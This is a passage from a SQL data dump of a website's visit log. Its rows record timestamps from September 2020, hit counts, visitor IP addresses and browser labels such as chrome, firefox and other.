,'31.13.127.3','other'),(536777,1599751245,1,1,0,0,'194.78.99.72','chrome'),(536778,1599751257,1,1,0,0,'31.13.127.2','other'),(536779,1599751419,1,1,0,0,'46.219.227.23','chrome'),(536780,1599751444,1,1,0,0,'94.153.65.182','chrome'),(536781,1599751524,1,1,0,0,'31.13.127.119','other'),(536782,1599751634,1,1,0,0,'46.211.61.241','chrome'),(536783,1599751886,1,1,0,0,'91.196.178.59','chrome'),(536784,1599752408,1,1,0,0,'37.53.123.128','chrome'),(536785,1599752472,1,1,0,0,'91.196.178.173','chrome'),(536786,1599753118,1,1,0,0,'173.252.95.118','chrome'),(536787,1599753141,1,1,0,0,'173.252.95.28','chrome'),(536789,1599753152,1,1,0,0,'91.196.178.129','chrome'),(536790,1599753459,1,1,0,0,'195.114.149.254','chrome'),(536791,1599754246,1,1,0,0,'94.153.11.181','chrome'),(536792,1599754678,1,1,0,0,'178.133.168.201','chrome'),(536793,1599754989,1,1,0,0,'46.211.68.159','chrome'),(536794,1599755116,1,1,0,0,'91.196.178.174','chrome'),(536795,1599755433,1,1,0,0,'91.196.178.74','chrome'),(536796,1599755456,1,1,0,0,'173.252.87.1','other'),(536797,1599755689,1,1,0,0,'195.10.210.70','chrome'),(536798,1599755881,1,1,0,0,'37.73.177.47','chrome'),(536799,1599755908,1,1,0,0,'94.153.81.6','chrome'),(536800,1599756168,1,1,0,0,'91.196.178.2','chrome'),(536801,1599756939,1,1,0,0,'91.196.178.174','other'),(536802,1599756967,1,1,0,0,'173.252.127.9','other'),(536803,1599756981,1,1,0,0,'94.254.198.208','chrome'),(536804,1599757024,1,1,0,0,'31.13.127.12','other'),(536805,1599757025,1,1,0,0,'31.13.127.5','other'),(536807,1599757028,1,1,0,0,'31.13.127.19','other'),(536808,1599757029,1,1,0,0,'31.13.127.120','other'),(536809,1599757308,1,1,0,0,'91.196.178.60','chrome'),(536810,1599757355,1,1,0,0,'91.196.178.2','chrome'),(536811,1599757826,1,1,0,0,'193.194.125.145','chrome'),(536812,1599757993,1,1,0,0,'46.211.39.193','chrome'),(536813,1599758336,1,1,0,0,'91.196.178.130','chrome'),(536814,1599758549,1,1,0,0,'66.220.149.21','other'),(536815,1599758557,1,1,0,0,'94.153.26.8','chrome'),(536816,1599758584,1,1,0,0,'91.225.232.225','other'),(536817,1599758644,1,1,0,0,'91.196.178.2','chrome'),(536818,1599759162,1,1,0,0,'91.196.178.112','chrome'),(536819,1599759250,1,1,0,0,'91.196.178.79','chrome'),(536820,1599759346,1,1,0,0,'94.153.49.194','other'),(536821,1599759799,1,1,0,0,'91.196.178.20','chrome'),(536822,1599759804,1,1,0,0,'46.45.185.166','chrome'),(536823,1599759938,2,2,0,0,'173.252.111.3','other'),(536824,1599759956,1,1,0,0,'91.196.178.118','chrome'),(536825,1599760398,1,1,0,0,'31.13.127.9','other'),(536826,1599761011,1,1,0,0,'46.211.10.33','chrome'),(536827,1599761066,1,1,0,0,'173.252.95.26','other'),(536828,1599761406,1,1,0,0,'91.196.178.186','chrome'),(536829,1599762611,1,1,0,0,'94.231.183.53','chrome'),(536830,1599762612,1,1,0,0,'91.196.178.104','chrome'),(536831,1599762901,1,1,0,0,'94.153.49.152','chrome'),(536832,1599762937,1,1,0,0,'91.196.178.2','chrome'),(536833,1599763091,1,1,0,0,'91.196.178.60','chrome'),(536834,1599763267,1,1,0,0,'185.234.67.0','chrome'),(536835,1599763608,1,1,0,0,'91.196.178.147','chrome'),(536836,1599763824,1,1,0,0,'88.155.137.246','chrome'),(536837,1599764020,1,1,0,0,'46.201.113.150','chrome'),(536838,1599764346,1,1,0,0,'173.252.111.11','other'),(536839,1599764347,1,1,0,0,'173.252.111.118','other'),(536840,1599764545,1,1,0,0,'91.124.181.251','chrome'),(536841,1599764602,1,1,0,0,'176.105.197.151','chrome'),(536842,1599764723,1,1,0,0,'185.8.41.69','other'),(536843,1599765067,1,1,0,0,'91.196.178.2','chrome'),(536844,1599765224,1,1,0,0,'173.252.79.119','other'),(536845,1599765246,1,1,0,0,'46.211.41.247','chrome'),(536846,1599766271,1,1,0,0,'185.109.53.102','chrome'),(536847,1599766467,1,1,0,0,'91.196.178.2','chrome'),(536848,1599766719,1,1,0,0,'213.109.224.86','chrome'),(536849,1599766821,1,1,0,0,'178.137.206.211','chrome'),(536850,1599767048,1,1,0,0,'178.133.69.134','chrome'),(536851,1599767346,1,1,0,0,'31.13.127.10','other'),(536852,1599768127,1,1,0,0,'91.196.178.2','chrome'),(536853,1599768579,1,1,0,0,'91.196.178.189','chrome'),(536854,1599769225,1,1,0,0,'92.113.127.239','chrome'),(536855,1599769475,1,1,0,0,'109.243.86.180','chrome'),(536856,1599769477,1,1,0,0,'173.252.111.17','other'),(536857,1599770619,1,1,0,0,'91.196.178.146','chrome'),(536858,1599770685,1,1,0,0,'92.253.204.40','chrome'),(536859,1599772444,1,1,0,0,'91.196.178.20','chrome'),(536860,1599772842,1,1,0,0,'37.53.228.78','chrome'),(536861,1599773458,1,1,0,0,'46.107.230.83','chrome'),(536862,1599773631,1,1,0,0,'46.211.78.139','chrome'),(536863,1599774052,2,0,2,0,'66.249.66.78',''),(536864,1599776823,1,1,0,0,'92.113.189.247','chrome'),(536865,1599778532,1,1,0,0,'194.44.97.23','other'),(536866,1599779808,1,1,0,0,'173.252.79.11','other'),(536868,1599779809,1,1,0,0,'173.252.87.116','other'),(536869,1599781429,1,1,0,0,'173.252.127.27','other'),(536870,1599781448,1,1,0,0,'69.171.251.119','other'),(536871,1599788690,1,1,0,0,'31.13.115.116','other'),(536872,1599788850,1,1,0,0,'88.155.8.26','chrome'),(536873,1599788874,1,1,0,0,'31.13.115.1','other'),(536874,1599792821,1,1,0,0,'91.196.178.170','other'),(536875,1599794257,1,1,0,0,'69.171.251.8','other'),(536877,1599794258,1,1,0,0,'69.171.249.4','other'),(536879,1599794259,1,1,0,0,'69.171.249.116','other'),(536885,1599795164,1,1,0,0,'69.171.251.119','other'),(536886,1599795462,1,1,0,0,'91.196.178.2','chrome'),(536887,1599796532,1,1,0,0,'46.211.25.184','chrome'),(536888,1599796982,1,1,0,0,'46.211.42.169','chrome'),(536889,1599797363,1,1,0,0,'91.196.178.92','chrome'),(536890,1599797706,1,1,0,0,'185.234.67.15','chrome'),(536891,1599798252,1,1,0,0,'195.10.210.70','chrome'),(536892,1599798327,1,1,0,0,'66.220.149.117','other'),(536893,1599798507,1,1,0,0,'173.252.95.8','other'),(536894,1599799332,1,1,0,0,'185.234.67.30','chrome'),(536895,1599800208,1,1,0,0,'176.98.21.186','chrome'),(536896,1599800309,1,1,0,0,'94.153.71.234','chrome'),(536897,1599801776,1,1,0,0,'91.196.178.180','other'),(536898,1599802156,1,1,0,0,'31.13.127.3','other'),(536899,1599802442,2,2,0,0,'77.222.134.99','firefox'),(536900,1599802610,1,1,0,0,'173.252.111.13','other'),(536902,1599802611,1,1,0,0,'173.252.111.12','other'),(536908,1599802612,1,1,0,0,'173.252.111.6','other'),(536909,1599802985,1,1,0,0,'46.211.49.147','chrome'),(536910,1599803399,1,1,0,0,'173.252.107.16','other'),(536911,1599803400,1,1,0,0,'69.171.251.13','other'),(536912,1599803545,1,1,0,0,'91.189.157.163','chrome'),(536913,1599803940,1,1,0,0,'91.196.178.173','chrome'),(536914,1599804110,1,1,0,0,'5.173.250.181','other'),(536915,1599804884,1,1,0,0,'95.132.48.143','chrome'),(536916,1599805101,1,1,0,0,'185.138.228.227','chrome'),(536917,1599805191,1,1,0,0,'185.11.29.214','chrome'),(536918,1599806384,1,1,0,0,'91.196.178.81','chrome'),(536919,1599806999,2,2,0,0,'91.196.178.137','chrome'),(536920,1599807347,1,1,0,0,'94.153.4.202','chrome'),(536921,1599808218,1,1,0,0,'91.196.178.81','chrome'),(536922,1599810758,1,1,0,0,'31.13.115.118','other'),(536923,1599813035,1,1,0,0,'91.196.178.81','chrome'),(536924,1599813117,1,1,0,0,'91.196.177.193','chrome'),(536925,1599814427,1,1,0,0,'69.171.251.21','other'),(536926,1599814428,1,1,0,0,'69.171.251.16','other'),(536927,1599814429,1,1,0,0,'69.171.251.31','other'),(536929,1599814640,1,1,0,0,'173.252.95.25','other'),(536930,1599815267,1,1,0,0,'66.220.149.27','other'),(536931,1599816230,1,0,1,0,'66.249.66.93',''),(536932,1599820919,1,1,0,0,'46.211.21.227','chrome'),(536933,1599822591,1,1,0,0,'69.171.251.113','other'),(536934,1599822620,1,1,0,0,'173.252.87.22','other'),(536935,1599825896,1,1,0,0,'46.211.19.124','chrome'),(536936,1599826443,1,1,0,0,'91.196.178.81','chrome'),(536937,1599826822,1,1,0,0,'46.211.60.126','chrome'),(536938,1599830327,1,1,0,0,'46.211.23.129','chrome'),(536939,1599830463,1,1,0,0,'91.196.178.68','chrome'),(536940,1599831998,1,1,0,0,'31.13.127.18','other'),(536941,1599832883,1,1,0,0,'69.171.251.118','other'),(536942,1599833151,1,1,0,0,'31.13.127.21','other'),(536943,1599833243,1,1,0,0,'66.220.149.13','other'),(536944,1599833248,1,1,0,0,'91.196.178.105','chrome'),(536945,1599837682,1,1,0,0,'46.211.48.176','chrome'),(536946,1599842186,1,1,0,0,'151.36.113.43','chrome'),(536947,1599843667,1,1,0,0,'91.196.178.2','chrome'),(536948,1599843802,1,1,0,0,'37.73.206.91','chrome'),(536949,1599846868,1,1,0,0,'173.252.111.17','other'),(536950,1599849397,1,1,0,0,'91.231.43.74','chrome'),(536951,1599849591,1,1,0,0,'173.252.111.120','other'),(536952,1599849592,1,1,0,0,'173.252.111.12','other'),(536953,1599850599,1,1,0,0,'93.175.230.214','chrome'),(536954,1599853211,1,1,0,0,'69.171.249.15','other'),(536955,1599853212,1,1,0,0,'69.171.249.119','other'),(536956,1599853896,1,1,0,0,'173.252.111.7','other'),(536957,1599856983,1,1,0,0,'91.221.218.20','chrome'),(536958,1599859576,1,0,1,0,'66.249.66.91',''),(536959,1599871982,1,1,0,0,'31.13.103.13','other'),(536960,1599878032,1,1,0,0,'91.196.178.2','chrome'),(536961,1599884251,1,1,0,0,'95.46.6.170','chrome'),(536962,1599889132,1,1,0,0,'46.211.8.54','chrome'),(536963,1599892838,1,0,1,0,'66.249.66.93',''),(536964,1599894799,1,1,0,0,'46.45.185.163','chrome'),(536965,1599899784,1,1,0,0,'173.252.79.21','other'),(536966,1599899840,1,1,0,0,'31.13.127.11','other'),(536967,1599907312,1,1,0,0,'173.252.107.13','other'),(536968,1599916486,1,1,0,0,'91.196.178.2','chrome'),(536969,1599916749,1,1,0,0,'31.13.127.19','other'),(536970,1599916750,1,1,0,0,'31.13.127.1','other'),(536971,1599916764,3,3,0,0,'31.13.127.5','other'),(536972,1599916765,1,1,0,0,'31.13.127.14','other'),(536974,1599916821,1,1,0,0,'31.13.127.4','other'),(536975,1599916823,1,1,0,0,'31.13.127.6','other'),(536976,1599916868,1,1,0,0,'66.220.149.28','other'),(536977,1599918804,1,1,0,0,'94.153.81.189','chrome'),(536978,1599918944,1,1,0,0,'91.196.178.2','chrome'),(536979,1599918962,1,1,0,0,'31.13.127.4','other'),(536980,1599919418,1,1,0,0,'31.13.127.1','other'),(536981,1599919419,2,2,0,0,'31.13.127.15','other'),(536982,1599919421,1,1,0,0,'31.13.127.11','other'),(536985,1599919422,1,1,0,0,'31.13.115.16','other'),(536988,1599919475,1,1,0,0,'31.13.127.7','other'),(536989,1599919476,1,1,0,0,'31.13.103.18','other'),(536990,1599919478,1,1,0,0,'31.13.127.112','other'),(536991,1599919479,1,1,0,0,'31.13.127.116','other'),(536992,1599919522,1,1,0,0,'91.196.178.92','chrome'),(536993,1599919527,1,1,0,0,'66.220.149.14','other'),(536994,1599919569,1,1,0,0,'91.196.178.152','chrome'),(536995,1599919594,1,1,0,0,'94.153.51.100','chrome'),(536996,1599919598,1,1,0,0,'91.196.178.7','chrome'),(536997,1599919621,1,1,0,0,'91.196.178.37','chrome'),(536998,1599919648,1,1,0,0,'91.196.178.53','chrome'),(536999,1599919663,1,1,0,0,'93.126.92.39','chrome'),(537000,1599919689,1,1,0,0,'37.55.227.94','chrome'),(537001,1599919723,1,1,0,0,'91.196.178.90','chrome'),(537002,1599919760,1,1,0,0,'46.211.62.201','chrome'),(537003,1599919811,1,1,0,0,'94.153.76.240','other'),(537004,1599919844,1,1,0,0,'91.196.178.179','chrome'),(537005,1599919848,1,1,0,0,'91.196.178.187','chrome'),(537006,1599919906,1,1,0,0,'31.13.127.4','other'),(537007,1599919907,1,1,0,0,'31.13.127.8','other'),(537009,1599919921,1,1,0,0,'91.196.178.47','chrome'),(537010,1599919985,1,1,0,0,'95.135.240.191','chrome'),(537011,1599920020,1,1,0,0,'37.73.98.253','chrome'),(537012,1599920035,1,1,0,0,'46.211.78.39','chrome'),(537013,1599920042,1,1,0,0,'176.113.170.104','chrome'),(537014,1599920082,1,1,0,0,'91.196.178.54','chrome'),(537015,1599920086,1,1,0,0,'91.196.178.2','chrome'),(537016,1599920102,1,1,0,0,'95.133.193.195','other'),(537017,1599920167,1,1,0,0,'91.196.178.107','chrome'),(537018,1599920236,1,1,0,0,'94.153.5.156','chrome'),(537019,1599920425,1,1,0,0,'88.155.55.73','chrome'),(537020,1599920448,1,1,0,0,'195.10.210.70','chrome'),(537021,1599920449,1,1,0,0,'37.53.111.132','chrome'),(537022,1599920450,1,1,0,0,'178.92.249.195','chrome'),(537023,1599920506,1,1,0,0,'91.196.178.166','chrome'),(537024,1599920552,1,1,0,0,'46.133.181.215','other'),(537025,1599920981,1,1,0,0,'176.100.4.86','chrome'),(537026,1599920999,1,1,0,0,'91.196.178.146','chrome'),(537027,1599921031,1,1,0,0,'91.196.178.156','chrome'),(537028,1599921173,1,1,0,0,'159.224.216.39','other'),(537029,1599921196,1,1,0,0,'88.155.156.189','chrome'),(537030,1599921444,1,1,0,0,'91.196.178.66','chrome'),(537031,1599921451,1,1,0,0,'91.196.177.171','chrome'),(537032,1599921691,1,1,0,0,'95.132.28.247','chrome'),(537033,1599921704,1,1,0,0,'31.13.127.119','other'),(537034,1599921866,1,1,0,0,'91.196.178.167','chrome'),(537035,1599921878,1,1,0,0,'212.90.164.219','chrome'),(537036,1599921947,1,1,0,0,'91.196.178.156','chrome'),(537037,1599921978,1,1,0,0,'46.211.51.40','chrome'),(537038,1599921981,1,1,0,0,'37.73.182.55','chrome'),(537039,1599921988,1,1,0,0,'178.133.229.159','chrome'),(537040,1599921996,1,1,0,0,'46.211.5.58','chrome'),(537041,1599922061,1,1,0,0,'91.196.178.105','chrome'),(537042,1599922122,1,1,0,0,'31.13.127.14','other'),(537043,1599922123,1,1,0,0,'31.13.127.8','other'),(537044,1599922164,1,1,0,0,'178.133.21.93','chrome'),(537045,1599922200,1,1,0,0,'46.211.78.115','chrome'),(537046,1599922361,1,1,0,0,'94.153.78.2','chrome'),(537047,1599922592,1,1,0,0,'46.211.47.100','chrome'),(537048,1599922661,1,1,0,0,'91.196.178.76','chrome'),(537049,1599922750,1,1,0,0,'91.196.178.170','chrome'),(537050,1599922856,1,1,0,0,'94.153.71.76','chrome'),(537051,1599923043,1,1,0,0,'91.196.178.157','chrome'),(537052,1599923124,1,1,0,0,'91.221.218.23','chrome'),(537053,1599923307,1,1,0,0,'91.196.178.166','chrome'),(537054,1599923605,1,1,0,0,'91.196.178.69','chrome'),(537055,1599923695,1,1,0,0,'46.133.216.143','chrome'),(537056,1599923982,1,1,0,0,'37.73.92.217','chrome'),(537057,1599923999,1,1,0,0,'46.211.62.70','chrome'),(537058,1599924155,1,1,0,0,'91.196.178.147','chrome'),(537059,1599924294,1,1,0,0,'5.58.15.183','other'),(537060,1599924324,1,1,0,0,'91.196.178.2','chrome'),(537061,1599924407,1,1,0,0,'130.180.211.6','chrome'),(537062,1599925044,1,1,0,0,'37.73.13.73','chrome'),(537063,1599925106,1,1,0,0,'94.153.48.120','other'),(537064,1599925516,1,1,0,0,'91.196.177.21','chrome'),(537065,1599925590,1,1,0,0,'37.212.51.145','chrome'),(537066,1599925764,1,1,0,0,'95.132.31.71','chrome'),(537067,1599925980,1,1,0,0,'46.149.190.240','chrome'),(537068,1599926152,1,1,0,0,'46.175.136.147','chrome'),(537069,1599926171,2,2,0,0,'91.196.177.10','firefox'),(537070,1599926465,1,1,0,0,'91.196.178.14','chrome'),(537071,1599926565,1,1,0,0,'46.211.6.101','chrome'),(537072,1599926937,1,1,0,0,'46.211.44.250','chrome'),(537073,1599926983,1,1,0,0,'173.252.95.29','other'),(537074,1599926985,1,1,0,0,'173.252.95.35','other'),(537075,1599927124,1,1,0,0,'94.153.14.120','chrome'),(537076,1599927242,1,1,0,0,'66.220.149.10','other'),(537077,1599928006,1,1,0,0,'91.196.178.182','chrome'),(537078,1599928170,1,1,0,0,'91.196.178.79','chrome'),(537079,1599928311,1,1,0,0,'91.196.178.97','chrome'),(537080,1599928317,1,1,0,0,'212.113.42.131','other'),(537081,1599928574,1,1,0,0,'94.153.34.193','chrome'),(537082,1599928649,1,1,0,0,'88.155.73.180','other'),(537083,1599928702,1,1,0,0,'91.196.178.156','chrome'),(537084,1599928840,1,1,0,0,'178.133.141.122','chrome'),(537085,1599928876,1,1,0,0,'91.196.178.46','chrome'),(537086,1599929327,1,1,0,0,'130.180.210.188','chrome'),(537087,1599929877,1,1,0,0,'212.113.43.101','chrome'),(537088,1599929955,1,1,0,0,'91.196.121.134','chrome'),(537089,1599929998,1,1,0,0,'91.210.251.68','chrome'),(537090,1599930445,1,1,0,0,'91.196.178.74','chrome'),(537091,1599930455,1,1,0,0,'91.196.178.2','chrome'),(537092,1599930492,1,1,0,0,'91.196.178.10','chrome'),(537093,1599930698,1,1,0,0,'91.196.178.84','chrome'),(537094,1599930720,1,1,0,0,'91.209.11.172','chrome'),(537095,1599930746,1,1,0,0,'37.55.58.43','chrome'),(537096,1599930785,1,1,0,0,'130.180.210.188','chrome'),(537097,1599930988,1,1,0,0,'37.73.161.100','chrome'),(537098,1599931536,1,1,0,0,'37.54.20.16','chrome'),(537099,1599931657,1,1,0,0,'91.196.178.89','chrome'),(537100,1599931658,1,1,0,0,'91.196.178.186','chrome'),(537101,1599931682,1,1,0,0,'46.201.134.124','chrome'),(537102,1599931821,1,1,0,0,'46.211.10.219','chrome'),(537103,1599931839,1,1,0,0,'109.207.121.161','chrome'),(537104,1599931922,1,1,0,0,'91.196.178.161','chrome'),(537105,1599932180,1,1,0,0,'91.196.178.2','chrome'),(537106,1599932191,1,1,0,0,'46.211.31.128','chrome'),(537107,1599932600,1,1,0,0,'91.196.178.55','chrome'),(537108,1599932896,1,1,0,0,'91.196.178.51','chrome'),(537109,1599933388,1,1,0,0,'37.55.224.128','firefox'),(537110,1599933449,1,1,0,0,'91.196.178.47','chrome'),(537111,1599933462,1,1,0,0,'94.179.208.219','chrome'),(537112,1599933643,1,1,0,0,'91.196.178.73','chrome'),(537113,1599933917,1,1,0,0,'146.158.59.208','chrome'),(537114,1599934110,1,1,0,0,'37.53.231.68','chrome'),(537115,1599934119,1,1,0,0,'94.153.50.0','chrome'),(537116,1599934440,1,1,0,0,'66.220.149.120','other'),(537117,1599934720,1,1,0,0,'91.196.178.87','other'),(537118,1599934827,1,1,0,0,'94.153.74.50','chrome'),(537119,1599934839,1,1,0,0,'66.220.149.32','other'),(537120,1599935318,1,1,0,0,'37.73.11.91','chrome'),(537121,1599936045,1,1,0,0,'31.13.127.15','other'),(537122,1599936404,1,1,0,0,'173.252.95.18','other'),(537123,1599936534,1,1,0,0,'91.196.178.179','chrome'),(537124,1599936610,1,1,0,0,'91.196.178.185','other'),(537125,1599936656,1,1,0,0,'95.134.203.56','chrome'),(537126,1599936960,1,1,0,0,'91.196.178.41','chrome'),(537127,1599937136,1,1,0,0,'173.252.83.10','other'),(537128,1599937273,1,1,0,0,'91.196.178.170','chrome'),(537129,1599937500,1,1,0,0,'185.234.67.11','chrome'),(537130,1599938413,1,1,0,0,'66.220.149.5','other'),(537131,1599938437,1,1,0,0,'91.196.178.2','chrome'),(537132,1599938612,1,1,0,0,'46.211.74.81','other'),(537133,1599938614,1,1,0,0,'176.121.5.16','chrome'),(537134,1599938949,1,1,0,0,'91.196.178.21','chrome'),(537135,1599938985,1,1,0,0,'130.180.218.48','chrome'),(537136,1599939289,1,1,0,0,'91.196.178.55','chrome'),(537137,1599939497,1,1,0,0,'91.196.178.68','chrome'),(537138,1599939530,1,1,0,0,'91.196.178.180','chrome'),(537139,1599939666,1,1,0,0,'173.252.111.120','other'),(537140,1599939667,1,1,0,0,'173.252.111.117','other'),(537141,1599940008,1,1,0,0,'46.172.136.235','chrome'),(537142,1599940281,1,1,0,0,'185.138.228.227','chrome'),(537143,1599940473,1,1,0,0,'69.171.249.18','other'),(537144,1599940474,1,1,0,0,'69.171.249.3','other'),(537145,1599940746,1,1,0,0,'178.133.24.154','chrome'),(537146,1599940788,1,1,0,0,'173.252.111.12','other'),(537148,1599940791,1,1,0,0,'91.196.178.163','chrome'),(537149,1599940999,1,1,0,0,'193.164.94.152','chrome'),(537150,1599941098,1,1,0,0,'91.196.178.84','chrome'),(537151,1599941168,1,1,0,0,'46.211.74.27','chrome'),(537152,1599941490,1,1,0,0,'94.153.72.224','chrome'),(537153,1599941584,1,1,0,0,'69.171.251.18','other'),(537154,1599941676,1,1,0,0,'178.133.113.141','chrome'),(537155,1599941740,1,1,0,0,'91.196.178.9','chrome'),(537156,1599941814,1,1,0,0,'178.133.24.154','chrome'),(537157,1599941880,1,1,0,0,'195.10.210.70','chrome'),(537158,1599942279,1,1,0,0,'185.13.106.201','chrome'),(537159,1599942361,1,1,0,0,'193.43.95.145','chrome'),(537160,1599942450,1,1,0,0,'91.196.178.173','chrome'),(537161,1599942475,1,1,0,0,'91.196.178.52','chrome'),(537162,1599942505,1,1,0,0,'46.211.83.230','chrome'),(537163,1599942949,1,1,0,0,'37.73.110.43','chrome'),(537164,1599943581,1,1,0,0,'91.196.178.146','chrome'),(537165,1599943588,1,1,0,0,'178.92.154.189','chrome'),(537166,1599943773,1,1,0,0,'176.227.245.6','chrome'),(537167,1599944167,1,1,0,0,'91.196.178.173','chrome'),(537168,1599945351,1,0,1,0,'66.249.66.93',''),(537169,1599946596,1,1,0,0,'91.196.178.169','chrome'),(537170,1599948111,1,1,0,0,'178.92.72.59','chrome'),(537171,1599949429,1,1,0,0,'91.196.178.78','chrome'),(537172,1599949503,1,1,0,0,'173.252.111.12','other'),(537173,1599949505,1,1,0,0,'173.252.111.119','other'),(537174,1599949559,1,1,0,0,'46.211.65.19','chrome'),(537175,1599953341,1,1,0,0,'173.252.83.118','other'),(537176,1599963069,1,1,0,0,'173.252.83.117','other'),(537177,1599964755,1,1,0,0,'91.196.178.2','chrome'),(537178,1599964951,1,1,0,0,'173.252.79.112','other'),(537179,1599965263,1,1,0,0,'91.196.178.145','chrome'),(537180,1599965624,1,1,0,0,'46.211.20.160','chrome'),(537181,1599966572,1,1,0,0,'91.196.178.12','chrome'),(537182,1599966696,1,1,0,0,'94.153.69.221','chrome'),(537183,1599966825,1,0,1,0,'66.249.66.91',''),(537184,1599967308,1,1,0,0,'91.196.178.186','chrome'),(537185,1599967340,1,1,0,0,'94.153.23.83','chrome'),(537186,1599968108,1,1,0,0,'88.155.58.192','chrome'),(537187,1599969161,1,1,0,0,'91.196.178.136','chrome'),(537188,1599970520,1,1,0,0,'37.73.205.87','chrome'),(537189,1599971384,1,1,0,0,'173.252.111.113','other'),(537190,1599971811,1,1,0,0,'185.177.190.248','chrome'),(537191,1599971837,1,1,0,0,'46.211.20.133','chrome'),(537192,1599971951,1,1,0,0,'91.124.82.84','chrome'),(537193,1599972081,1,1,0,0,'95.134.202.189','chrome'),(537194,1599972176,1,1,0,0,'94.153.24.46','chrome'),(537195,1599973572,1,1,0,0,'91.240.100.224','chrome'),(537196,1599974170,1,1,0,0,'91.196.121.134','chrome'),(537197,1599974458,1,1,0,0,'94.153.8.68','chrome'),(537198,1599974853,1,1,0,0,'78.111.189.60','chrome'),(537199,1599974979,1,1,0,0,'188.163.82.234','chrome'),(537200,1599975675,1,1,0,0,'37.55.151.138','other'),(537201,1599975977,1,1,0,0,'91.196.178.103','chrome'),(537202,1599976294,1,1,0,0,'178.137.206.211','chrome'),(537203,1599976682,1,1,0,0,'91.196.178.156','chrome'),(537204,1599976879,1,1,0,0,'91.196.178.59','other'),(537205,1599976996,1,1,0,0,'37.73.117.147','chrome'),(537206,1599977373,1,1,0,0,'91.196.178.18','chrome'),(537207,1599977567,1,1,0,0,'91.196.178.108','chrome'),(537208,1599977609,1,1,0,0,'128.124.21.237','chrome'),(537209,1599978044,1,1,0,0,'37.73.117.147','chrome'),(537210,1599978045,1,1,0,0,'91.196.178.171','chrome'),(537211,1599978553,1,1,0,0,'91.124.181.251','chrome'),(537212,1599978835,1,1,0,0,'83.137.6.229','other'),(537213,1599979220,1,1,0,0,'91.196.178.148','chrome'),(537214,1599979485,1,1,0,0,'188.191.238.36','chrome'),(537215,1599979849,1,1,0,0,'95.132.45.164','other'),(537216,1599979851,1,1,0,0,'173.252.95.13','other'),(537217,1599979911,1,1,0,0,'93.73.208.42','chrome'),(537218,1599980136,1,1,0,0,'94.153.28.73','chrome'),(537219,1599980481,1,1,0,0,'92.113.191.36','chrome'),(537220,1599981884,1,1,0,0,'37.52.115.14','chrome'),(537221,1599982768,1,1,0,0,'46.211.30.242','chrome'),(537222,1599983133,1,1,0,0,'92.113.191.25','chrome'),(537223,1599983271,1,1,0,0,'91.196.178.175','chrome'),(537224,1599983431,1,1,0,0,'128.124.121.255','chrome'),(537225,1599983622,1,1,0,0,'91.196.178.186','chrome'),(537226,1599983835,1,1,0,0,'31.13.127.21','other'),(537227,1599984281,1,1,0,0,'91.196.178.67','chrome'),(537228,1599985412,1,1,0,0,'37.73.128.240','other'),(537229,1599986171,1,1,0,0,'92.112.116.253','chrome'),(537230,1599986223,1,1,0,0,'46.211.35.122','chrome'),(537231,1599986424,1,1,0,0,'37.55.151.27','chrome'),(537232,1599986504,1,1,0,0,'69.171.251.11','other'),(537233,1599988107,1,1,0,0,'31.41.107.50','chrome'),(537234,1599988309,1,1,0,0,'173.252.87.13','other'),(537235,1599988412,1,1,0,0,'69.171.251.16','other'),(537236,1599988968,1,1,0,0,'173.252.111.19','other'),(537237,1599989100,1,1,0,0,'195.10.210.70','chrome'),(537238,1599989161,1,1,0,0,'91.196.178.68','chrome'),(537239,1599989267,1,1,0,0,'46.211.7.205','chrome'),(537240,1599989925,1,1,0,0,'46.211.62.244','chrome'),(537241,1599991211,1,1,0,0,'66.220.149.3','other'),(537242,1599992188,1,1,0,0,'178.133.204.108','chrome'),(537243,1599992436,1,1,0,0,'173.252.127.19','other'),(537244,1599992651,1,1,0,0,'173.252.87.22','other'),(537245,1599993570,1,1,0,0,'178.133.204.108','chrome'),(537246,1599993754,1,1,0,0,'194.44.50.34','chrome'),(537247,1599993790,1,1,0,0,'46.211.41.241','chrome'),(537248,1599994244,1,1,0,0,'91.196.178.161','chrome'),(537249,1599995911,1,1,0,0,'91.196.178.2','chrome'),(537250,1599996017,1,1,0,0,'91.231.42.118','chrome'),(537251,1599998492,1,1,0,0,'91.196.178.129','chrome'),(537252,1599999451,1,1,0,0,'91.196.177.121','chrome'),(537253,1600001397,1,1,0,0,'91.196.178.164','chrome'),(537254,1600001462,1,1,0,0,'173.252.83.14','other'),(537255,1600001463,3,3,0,0,'66.220.149.3','other'),(537256,1600001476,1,1,0,0,'128.124.196.168','other'),(537257,1600001542,1,1,0,0,'173.252.127.30','other'),(537258,1600002548,1,1,0,0,'46.63.87.75','chrome'),(537259,1600004751,1,1,0,0,'178.92.73.167','chrome'),(537260,1600004962,1,1,0,0,'176.121.5.72','chrome'),(537261,1600006114,1,1,0,0,'31.13.127.21','other'),(537262,1600006262,1,1,0,0,'178.133.224.93','chrome'),(537263,1600006955,1,1,0,0,'91.196.178.116','chrome'),(537264,1600006989,1,1,0,0,'31.13.127.16','other'),(537265,1600007008,1,1,0,0,'31.13.127.24','other'),(537266,1600007568,1,1,0,0,'46.211.64.23','chrome'),(537267,1600008494,1,1,0,0,'46.211.29.220','chrome'),(537268,1600008709,1,1,0,0,'173.252.95.27','other'),(537269,1600009020,1,1,0,0,'91.231.43.74','chrome'),(537270,1600009152,1,1,0,0,'91.196.178.111','chrome'),(537271,1600009759,1,1,0,0,'178.133.224.93','chrome'),(537272,1600010154,1,1,0,0,'31.13.127.5','other'),(537273,1600010829,1,1,0,0,'37.73.74.10','chrome'),(537274,1600011690,1,1,0,0,'128.124.32.205','chrome'),(537275,1600013526,1,1,0,0,'173.252.87.1','other'),(537276,1600013542,1,1,0,0,'91.204.87.43','chrome'),(537277,1600016790,1,1,0,0,'91.196.178.59','chrome'),(537278,1600016832,1,1,0,0,'91.196.178.58','chrome'),(537279,1600017278,1,1,0,0,'91.196.178.46','chrome'),(537280,1600017299,1,1,0,0,'141.105.134.85','chrome'),(537281,1600018390,1,1,0,0,'173.252.87.10','other'),(537284,1600020075,1,1,0,0,'69.171.251.34','other'),(537285,1600020805,1,1,0,0,'91.196.178.142','chrome'),(537286,1600021059,1,1,0,0,'173.252.95.9','other'),(537287,1600021230,1,1,0,0,'176.118.49.10','chrome'),(537288,1600021963,1,1,0,0,'173.252.95.112','other'),(537289,1600022322,1,1,0,0,'188.163.77.186','chrome'),(537290,1600023841,1,1,0,0,'62.122.67.22','chrome'),(537291,1600024000,1,1,0,0,'194.44.50.38','chrome'),(537292,1600024038,1,1,0,0,'173.252.87.14','other'),(537293,1600024190,1,1,0,0,'91.241.113.90','chrome'),(537294,1600024293,1,1,0,0,'69.171.251.16','other'),(537295,1600024590,1,1,0,0,'91.196.178.120','chrome'),(537296,1600024719,1,1,0,0,'130.